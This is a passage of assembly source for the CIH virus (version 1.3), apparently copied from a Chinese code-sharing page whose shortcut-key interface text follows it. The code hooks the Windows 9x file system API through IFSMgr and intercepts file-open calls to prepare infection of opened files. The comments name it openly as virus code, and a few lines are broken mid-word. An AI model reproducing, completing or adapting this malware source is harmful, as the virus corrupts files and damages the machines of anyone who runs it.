📄 cih1.3.txt
字号:
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Add
ss
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook A
ress
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?
; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
@3 = FileSystemApiHook
pushad
call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDataStartAdd
ss
add esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !? *
; *************************************
test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -